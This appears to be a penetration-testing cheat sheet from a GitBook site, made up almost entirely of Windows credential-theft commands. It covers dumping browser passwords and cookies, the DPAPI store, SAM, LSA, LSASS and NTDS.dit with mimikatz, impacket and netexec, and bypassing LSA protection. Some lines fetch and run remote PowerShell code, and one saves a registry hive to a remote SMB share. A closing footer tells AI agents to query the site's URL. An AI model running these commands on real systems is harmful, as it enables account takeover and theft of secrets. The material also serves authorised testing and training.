# Credentials Attacks On Windows ## Web Credentials ```powershell PS C:\> start lazagne.exe all PS C:\> .\\SharpChrome.exe logins /unprotect PS C:\> vaultcmd /list PS C:\> vaultcmd /listcreds:"Web Credentials" /all #-----------EDGE--------------------------------- #Extract credentials from Edge Browswer PS C:\> (Get-Content "C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key mimikatz dpapi::chrome /in:"C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /encryptedkey:e4x8+n0VDX82CffsyVmOzvSraXQ== /unprotect #-----------Firefox------------------------------- #Extract passwords from profiles of Mozilla Intrusionz3r0@htb[/htb]$ python firefox_decrypt.py /folder/containing/profiles.ini/ #Cookies #Path: %APPDATA%\Mozilla\Firefox\Profiles\.default-release Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d #---------Chromium-------------------------------- PS C:\> (Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key mimikatz dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect #Cookies #Path: %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies PS C:\> IEX(New-Object Net.WebClient).DownloadString(' copy "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies" PS C:\> Invoke-SharpChromium -Command "cookies slack.com" ``` ## Credentials manager ```powershell #Listing Saved Credentials PS C:\> cmdkey /list #Enumerate windows credentials PS C:\> vaultcmd /listcreds:"Windows Credentials" /all PS C:\> C:\Temp>SharpDPAPI.exe machinecredentials #Find credentials store PS C:\> C:\Users\\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx/556a2412-xxxx-4ccf-b721-e6a0b4f90407 #1. Decrypt master key mimikatz \"dpapi::masterkey /in:C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\\556a2412-xxxx-4ccf-b721-e6a0b4f90407 /password:MYPASSWORD123 /protected \" exit #2. Extract credentials mimikatz \"dpapi::cred /in:C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Credentials\\C8XXXXXXXXXXXXXXXXXXXXXXXX1B9 /masterkey:d9af319e9c84 ``` ## DPAPI 
#Using Donpapi (best options)
donpapi collect -u 'John.ford' -H 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' --collectors All --target vdixx.eu-xxxx.vl -d eu-xxxx.vl --dc-ip xx.xx.xx.xx

#Using netexec
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi cookies
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi nosystem
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --local-auth --dpapi nosystem
## Search Credentials ### Extract credentials using SessionGopher ```powershell PS C:\\htb> Import-Module .\\SessionGopher.ps1 PS C:\\Tools> Invoke-SessionGopher -Target WINLPE-SRV01 ``` ### Sniff passwords and hashes with net-creds ```sh Intrusionz3r0@htb[/htb]$ sudo python net-creds.py Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0 ``` ### Search credentials on the registry ```powershell REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` ### Search for file contents ```powershell cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt findstr /spin "password" *.* dir | select-string "password" PS C:\\htb> Get-ChildItem -Path C:\\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue PS C:\\htb> Get-ChildItem -Path "C:\\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line ``` ### Search for filename ```powershell dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C:\ user.txt where /R C:\ *.ini C:\\htb> dir \\confidentials.txt /s /p PS C:\\htb> Get-ChildItem -Path C:\\ -Filter "confidentials.txt" -Recurse ``` ### Passwords in unattend.xml ```sh C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml ``` ### Retrieve Putty Credentials from registry ```powershell PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions\\ ``` ## PowerShell ### Powershell History File 
PS C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\> cat (Get-PSReadlineOption).HistorySavePath
### Powershell Transcript ```powershell PS C:\> gc C:\Users\\Documents\PowerShell_transcript....txt PS C:\> gc C:\Transcripts\\PowerShell_transcript....txt ``` ### **Recover credentials on PowerShell scripts** **First Option:** ```bash PS C:\\htb> $credential = Import-Clixml -Path 'C:\\scripts\\pass.xml' PS C:\\htb> $credential.GetNetworkCredential().username PS C:\\htb> $credential.GetNetworkCredential().password Str0ng3ncryptedP@ss! ``` **Second Option** 
PS C:\> $user = "Administrator"
PS C:\> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
PS C:\> cred = New-Object System.Management.Automation.PSCredential($user, $pass)
PS C:\> $cred.GetNetworkCredential() | Format-List
## Alternate Data Stream ### Retrieve Credentials on data streams ```powershell PS > Get-Item -path flag.txt -Stream * PS > Get-Content -path flag.txt -Stream Flag ``` ## Clipboard ### Monitor Clipboard ```powershell PS C:\\htb> IEX(New-Object Net.WebClient).DownloadString('') PS C:\\htb> Invoke-ClipboardLogger ``` ## **Sensitive Files** ### IIS Web config ```powershell PS C:\> Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` ### Retrieve password from Wireless ```powershell C:\\htb> netsh wlan show profile C:\\htb> netsh wlan show profile key=clear cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on ``` ## Sticky notes ```powershell #Path: C:\\Users\\\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;" Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal PS C:\\htb> Set-ExecutionPolicy Bypass -Scope Process PS C:\\htb> cd .\\PSSQLite\\ PS C:\\htb> Import-Module .\\PSSQLite.psd1 PS C:\\htb> $db = 'C:\\Users\\htb-student\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite' PS C:\\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap ``` ### **Copying SAM SYSTEM and Security** ```bash C:\\WINDOWS\\system32> reg.exe save hklm\\sam C:\\sam.save C:\\WINDOWS\\system32> reg.exe save hklm\\system C:\\system.save C:\\WINDOWS\\system32> reg.exe save hklm\\security C:\\security.save ``` ### **Dumping SAM and SYSTEM** 
Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16  save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL 
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam
### Dump LSA ```bash Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa ``` ### Dump lsass ```bash #Finding LSASS PID in cmd C:\\Windows\\system32> tasklist /svc #Finding LSASS PID in Powershell PS C:\\Windows\\system32> Get-Process lsass #---------------------------------------- #Create lssas file PS C:\\Windows\\system32> rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full #dump the lsass.dmp file. Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp C:\\Windows\\system32> .\\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit ``` #### Dump lsass using RDP session
### Dump NTDS.dit To make a copy of the NTDS.dit file, we need local admin (`Administrators group`) or Domain Admin (`Domain Admins group`) (or equivalent) rights. ```bash #List the localgroups C:\\> net localgroup #Check user permission. C:\\> net user bwilliamson #Check the shadow copy C:\\> vssadmin CREATE SHADOW /For=C: #Move the file. C:\\> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit #Extracting Credentials from NTDS.dit PS C:\\htb> Import-Module .\\DSInternals.psd1 PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key #Extracting Hashes Using SecretsDump Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL # Fastest way to steal the NTDS. Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds ``` ## Mimikatz ```sh # Dump the local SAM database mimikatz lsadump::sam #Dump LSA mimikatz lsadump::lsa /inject #Dump secrets mimikatz lsadump::secrets # Dump the logon passwords mimikatz sekurlsa::logonpasswords # Dump the encryption keys used by Kerberos. mimikatz sekurlsa::ekeys # Dump Domain Cached Credentials mimikatz lsadump::cache #Dump secrets trust mimikatz lsadump::sam ``` #### **Bypassing LSA protection** **Error:** `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)` ``` !+ !processprotect /process:lsass.exe /remove privilege::debug sekurlsa::logonpasswords ```
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/credentials-attacks-on-windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.